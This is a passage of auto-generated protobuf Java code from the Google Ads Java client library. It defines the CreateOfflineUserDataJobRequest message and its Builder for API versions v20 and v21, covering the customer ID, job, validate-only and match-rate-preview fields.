[OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v20.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v20_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v20_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.Builder.class); } // Construct using com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getJobFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; customerId_ = ""; job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } validateOnly_ = false; enableMatchRateRangePreview_ = false; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v20.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v20_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override public com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest build() { com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest buildPartial() { com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest result = new com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.customerId_ = customerId_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000002) != 0)) { result.job_ = jobBuilder_ == null ? job_ : jobBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000004) != 0)) { result.validateOnly_ = validateOnly_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.enableMatchRateRangePreview_ = enableMatchRateRangePreview_; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) { return mergeFrom((com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest other) { if (other == com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.getDefaultInstance()) return this; if (!other.getCustomerId().isEmpty()) { customerId_ = other.customerId_; bitField0_ |= 0x00000001; onChanged(); } if (other.hasJob()) { mergeJob(other.getJob()); } if (other.getValidateOnly() != false) { setValidateOnly(other.getValidateOnly()); } if (other.getEnableMatchRateRangePreview() != false) { setEnableMatchRateRangePreview(other.getEnableMatchRateRangePreview()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { customerId_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage( getJobFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 case 24: { validateOnly_ = input.readBool(); bitField0_ |= 0x00000004; break; } // case 24 case 40: { enableMatchRateRangePreview_ = input.readBool(); bitField0_ |= 0x00000008; break; } // case 40 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. */ public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } else { return (java.lang.String) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The customerId to set. * @return This builder for chaining. */ public Builder setCustomerId( java.lang.String value) { if (value == null) { throw new NullPointerException(); } customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return This builder for chaining. */ public Builder clearCustomerId() { customerId_ = getDefaultInstance().getCustomerId(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The bytes for customerId to set. * @return This builder for chaining. */ public Builder setCustomerIdBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private com.google.ads.googleads.v20.resources.OfflineUserDataJob job_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.OfflineUserDataJob, com.google.ads.googleads.v20.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v20.resources.OfflineUserDataJobOrBuilder> jobBuilder_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ public boolean hasJob() { return ((bitField0_ & 0x00000002) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. */ public com.google.ads.googleads.v20.resources.OfflineUserDataJob getJob() { if (jobBuilder_ == null) { return job_ == null ? com.google.ads.googleads.v20.resources.OfflineUserDataJob.getDefaultInstance() : job_; } else { return jobBuilder_.getMessage(); } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob(com.google.ads.googleads.v20.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (value == null) { throw new NullPointerException(); } job_ = value; } else { jobBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob( com.google.ads.googleads.v20.resources.OfflineUserDataJob.Builder builderForValue) { if (jobBuilder_ == null) { job_ = builderForValue.build(); } else { jobBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder mergeJob(com.google.ads.googleads.v20.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && job_ != null && job_ != com.google.ads.googleads.v20.resources.OfflineUserDataJob.getDefaultInstance()) { getJobBuilder().mergeFrom(value); } else { job_ = value; } } else { jobBuilder_.mergeFrom(value); } if (job_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder clearJob() { bitField0_ = (bitField0_ & ~0x00000002); job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v20.resources.OfflineUserDataJob.Builder getJobBuilder() { bitField0_ |= 0x00000002; onChanged(); return getJobFieldBuilder().getBuilder(); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v20.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { if (jobBuilder_ != null) { return jobBuilder_.getMessageOrBuilder(); } else { return job_ == null ? com.google.ads.googleads.v20.resources.OfflineUserDataJob.getDefaultInstance() : job_; } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.OfflineUserDataJob, com.google.ads.googleads.v20.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v20.resources.OfflineUserDataJobOrBuilder> getJobFieldBuilder() { if (jobBuilder_ == null) { jobBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.OfflineUserDataJob, com.google.ads.googleads.v20.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v20.resources.OfflineUserDataJobOrBuilder>( getJob(), getParentForChildren(), isClean()); job_ = null; } return jobBuilder_; } private boolean validateOnly_ ; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @param value The validateOnly to set. * @return This builder for chaining. */ public Builder setValidateOnly(boolean value) { validateOnly_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return This builder for chaining. */ public Builder clearValidateOnly() { bitField0_ = (bitField0_ & ~0x00000004); validateOnly_ = false; onChanged(); return this; } private boolean enableMatchRateRangePreview_ ; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. */ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @param value The enableMatchRateRangePreview to set. * @return This builder for chaining. */ public Builder setEnableMatchRateRangePreview(boolean value) { enableMatchRateRangePreview_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return This builder for chaining. */ public Builder clearEnableMatchRateRangePreview() { bitField0_ = (bitField0_ & ~0x00000008); enableMatchRateRangePreview_ = false; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) private static final com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest(); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> PARSER = new com.google.protobuf.AbstractParser<CreateOfflineUserDataJobRequest>() { @java.lang.Override public CreateOfflineUserDataJobRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,977
google-ads-stubs-v21/src/main/java/com/google/ads/googleads/v21/services/CreateOfflineUserDataJobRequest.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v21/services/offline_user_data_job_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v21.services; /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v21.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest} */ public final class CreateOfflineUserDataJobRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) CreateOfflineUserDataJobRequestOrBuilder { private static final long serialVersionUID = 0L; // Use CreateOfflineUserDataJobRequest.newBuilder() to construct. private CreateOfflineUserDataJobRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CreateOfflineUserDataJobRequest() { customerId_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CreateOfflineUserDataJobRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v21_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v21_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.Builder.class); } private int bitField0_; public static final int CUSTOMER_ID_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. */ @java.lang.Override public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ @java.lang.Override public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int JOB_FIELD_NUMBER = 2; private com.google.ads.googleads.v21.resources.OfflineUserDataJob job_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ @java.lang.Override public boolean hasJob() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. */ @java.lang.Override public com.google.ads.googleads.v21.resources.OfflineUserDataJob getJob() { return job_ == null ? com.google.ads.googleads.v21.resources.OfflineUserDataJob.getDefaultInstance() : job_; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v21.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ @java.lang.Override public com.google.ads.googleads.v21.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { return job_ == null ? com.google.ads.googleads.v21.resources.OfflineUserDataJob.getDefaultInstance() : job_; } public static final int VALIDATE_ONLY_FIELD_NUMBER = 3; private boolean validateOnly_ = false; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } public static final int ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER = 5; private boolean enableMatchRateRangePreview_ = false; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. */ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getJob()); } if (validateOnly_ != false) { output.writeBool(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { output.writeBool(5, enableMatchRateRangePreview_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getJob()); } if (validateOnly_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(5, enableMatchRateRangePreview_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest)) { return super.equals(obj); } com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest other = (com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) obj; if (!getCustomerId() .equals(other.getCustomerId())) return false; if (hasJob() != other.hasJob()) return false; if (hasJob()) { if (!getJob() .equals(other.getJob())) return false; } if (getValidateOnly() != other.getValidateOnly()) return false; if (getEnableMatchRateRangePreview() != other.getEnableMatchRateRangePreview()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + CUSTOMER_ID_FIELD_NUMBER; hash = (53 * hash) + getCustomerId().hashCode(); if (hasJob()) { hash = (37 * hash) + JOB_FIELD_NUMBER; hash = (53 * hash) + getJob().hashCode(); } hash = (37 * hash) + VALIDATE_ONLY_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getValidateOnly()); hash = (37 * hash) + ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getEnableMatchRateRangePreview()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v21.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest) com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v21_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v21_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.Builder.class); } // Construct using com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getJobFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; customerId_ = ""; job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } validateOnly_ = false; enableMatchRateRangePreview_ = false; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v21.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v21_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override public com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest build() { com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest buildPartial() { com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest result = new com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v21.services.CreateOfflineUserDataJobRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.customerId_ = customerId_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000002) != 0)) { result.job_ = jobBuilder_ == null ? job_ : jobBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000004) != 0)) { result.validateOnly_ = validateOnly_; } if (((from_bitField0_ & 0x00000008) != 0)) { 